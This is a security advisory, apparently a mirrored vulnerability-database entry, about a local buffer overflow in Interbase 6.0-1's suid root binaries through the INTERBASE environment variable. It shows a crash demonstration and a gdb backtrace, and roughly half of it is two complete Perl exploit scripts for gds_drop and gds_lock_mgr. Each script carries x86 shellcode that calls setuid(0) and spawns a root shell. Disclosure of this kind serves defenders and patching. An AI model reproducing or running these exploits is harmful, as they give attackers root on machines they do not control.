|
Brought to you by:
Suppliers of:
|
|
|
| |
| Interbase is a high-performance, cross-platform, and SQL standards--compliant relational database. A security vulnerability in the product allows local attackers to overflow an internal buffer causing it to execute arbitrary code. |
| |
Credit:
The information has been provided by KF.
|
| |
Vulnerable systems:
* Interbase versions 6.0-1
Interbase-6.0-1.i386.rpm provided with Mandrake 7.2 contains an issue when reading the environment variable "INTERBASE". This issue is demonstrated below.
[dotslash@ghetto dotslash]$ export INTERBASE=`perl -e 'print "A" x 500'`
[dotslash@ghetto dotslash]$ /usr/local/interbase/bin/gds_drop
Segmentation fault
This issue results in a malloc() overflow.
The following suid root binaries are potentially exploitable.
/usr/local/interbase/bin/gds_drop
/usr/local/interbase/bin/gds_inet_server
/usr/local/interbase/bin/gds_lock_mgr
(gdb) r
Starting program: /usr/local/interbase/bin/gds_drop
Program received signal SIGSEGV, Segmentation fault.
0x400a0832 in ptmalloc_init () at malloc.c:1696
1696 malloc.c: No such file or directory.
in malloc.c
(gdb) bt
#0 0x400a0832 in ptmalloc_init () at malloc.c:1696
#1 0x400a4e64 in malloc_hook_ini (sz=364, caller=0x40092571) at
malloc.c:1856
#2 0x400a0f8d in __libc_malloc (bytes=364) at malloc.c:2798
#3 0x40092571 in _IO_new_fopen (
filename=0xbfffd65c 'A' <repeats 200 times>..., mode=0x80583c0 "r")
at iofopen.c:50
#4 0x0804a244 in ISC_get_config ()
#5 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
Impact:
Local root can be exploited.
Vendor status:
Vendor has been contacted however, no offical response has received of as today.
Exploit (gds_drop):
#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#
($offset) = @ARGV,$offset || ($offset = 0);
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$ENV{"FOO"} = $sc;
$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";
$ENV{"INTERBASE"} = $buf;
exec("/usr/local/interbase/bin/gds_drop");
Exploit (gds_lock_mgr):
#!/usr/bin/perl -w
#
# gds_lock_mgr exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# Note: We cannot attach to an interactive shell so it
# will execute /tmp/sh instead...
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#
($offset) = @ARGV,$offset || ($offset = 0);
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
$ENV{"FOO"} = $sc;
$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";
$ENV{"INTERBASE"} = $buf;
exec("/usr/local/interbase/bin/gds_lock_mgr");
|
|
|
|
|
